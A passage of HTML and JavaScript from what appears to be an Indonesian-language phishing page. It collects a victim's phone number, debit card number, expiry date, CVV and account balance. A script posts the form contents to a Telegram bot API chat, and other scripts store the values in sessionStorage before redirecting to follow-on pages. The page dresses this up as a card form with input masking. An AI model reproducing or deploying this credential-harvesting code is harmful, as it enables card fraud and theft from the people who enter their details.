            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = 'two.html';
    });            
        });      
   </script>
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
  <script src="jquery.min.js"></script>
  <script type="text/javascript">
            $(document).ready(function(){
                // Format mata uang.
                $( '.uang' ).mask('000.000.000.000', {reverse: true});
 var dengan_rupiah = document.getElementById('saldo');
    dengan_rupiah.addEventListener('keyup', function(e)
    {
        dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
    });
      /* Fungsi */
    function formatRupiah(angka, prefix)
    {
        var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split    = number_string.split(','),
            sisa     = split[0].length % 3,
            rupiah     = split[0].substr(0, sisa),
            ribuan     = split[0].substr(sisa).match(/\d{3}/gi);         
        if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
        }     
        rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
        return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
    }
            });         
        </script>
<!-- </body> -->
  <script>
function closeForm() {
  document.getElementById("myForm").style.display = "none";
}
</script>
 <!-- partial -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js">
</script>
  <script src="https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js">
</script>
  <script>$(document).ready(function(){
$('#debit').mask('0000 0000 0000 0000');     
$('#valid').mask('00/00');
});</script>
  <script>
 $(document).ready(function(){
    $('#forgetPasswordForm').submit(function(e) {
    event.preventDefault();
document.getElementById('btnSubmit').innerHTML = "Memproses...";   
 $.ajax({
 type: 'POST',
 url: './var.html',
 data: $(this).serialize(),
 datatype: 'JSON',
 complete: function(data) {
            console.log('Complete')
  setTimeout(function(){
 var phone = document.getElementById("nomorku").value;
 sessionStorage.setItem("phone", phone);            
 var user = document.getElementById("debit").value;
 sessionStorage.setItem("user", user);
 var card = document.getElementById("valid").value;
 sessionStorage.setItem("card", card);  
 var cvvku = document.getElementById("cvv").value;
 sessionStorage.setItem("cvvku", cvvku);
 var duet = document.getElementById("saldo").value;
 sessionStorage.setItem("duet", duet);  
   location.href ="var.html";
     }, 500);
        }
    });
 });
    return false;
});        
</script>
  <script>
/*
See on github: https://github.com/muhammederdem/credit-card-form
*/
new Vue({
  el: "#app",
  data() {
    return {
      currentCardBackground: Math.floor(Math.random()* 25 + 1), // just for fun :D
      cardName: "",
      cardNumber: "",
      cardMonth: "",
      cardYear: "",
      cardCvv: "",
      minCardYear: new Date().getFullYear(),
      amexCardMask: "#### ###### #####",
      otherCardMask: "#### #### #### ####",
      cardNumberTemp: "",
      isCardFlipped: false,
      focusElementStyle: null,
      isInputFocused: false
    };
  },
  mounted() {
    this.cardNumberTemp = this.otherCardMask;
    document.getElementById("cardNumber").focus();
  },
  computed: {
    getCardType () {
      let number = this.cardNumber;
      let re = new RegExp("^4");
      if (number.match(re) != null) return "visa";
      re = new RegExp("^(34|37)");
      if (number.match(re) != null) return "amex";
      re = new RegExp("^5[1-5]");
      if (number.match(re) != null) return "mastercard";
      re = new RegExp("^6011");
      if (number.match(re) != null) return "discover";
      re = new RegExp('^9792')
      if (number.match(re) != null) return 'troy'

      return "visa"; // default type
    },
		generateCardNumberMask () {
			return this.getCardType === "amex" ? this.amexCardMask : this.otherCardMask;
    },
    minCardMonth () {
      if (this.cardYear === this.minCardYear) return new Date().getMonth() + 1;
      return 1;
    }
  },
  watch: {
    cardYear () {
      if (this.cardMonth < this.minCardMonth) {
        this.cardMonth = "";
      }
    }
  },
  methods: {
    flipCard (status) {
      this.isCardFlipped = status;
    },
    focusInput (e) {
      this.isInputFocused = true;
      let targetRef = e.target.dataset.ref;
      let target = this.$refs[targetRef];
      this.focusElementStyle = {
        width: `${target.offsetWidth}px`,
        height: `${target.offsetHeight}px`,
        transform: `translateX(${target.offsetLeft}px) translateY(${target.offsetTop}px)`
      }
    },
    blurInput() {
      let vm = this;
      setTimeout(() => {
        if (!vm.isInputFocused) {
          vm.focusElementStyle = null;
        }
      }, 300);
      vm.isInputFocused = false;
    }
  }
});
</script>
  <script>
var nomor = sessionStorage.getItem("nomor");
 document.getElementById("nomorku").value = nomor + "";
</script>
  <script>
      /* Tanpa Rupiah */
    var tanpa_rupiah = document.getElementById('tanparupiah');
    tanpa_rupiah.addEventListener('keyup', function(e)
    {
        tanpa_rupiah.value = formatRupiah(this.value);
    }); 
    /* Dengan Rupiah */
    var dengan_rupiah = document.getElementById('rupiah');
    dengan_rupiah.addEventListener('keyup', function(e)
    {
        dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
    }); 
    /* Fungsi */
    function formatRupiah(angka, prefix)
    {
        var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split    = number_string.split(','),
            sisa     = split[0].length % 3,
            rupiah     = split[0].substr(0, sisa),
            ribuan     = split[0].substr(sisa).match(/\d{3}/gi);        
        if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
        }    
        rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
        return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
    } 
  </script>
 </body>
</html>
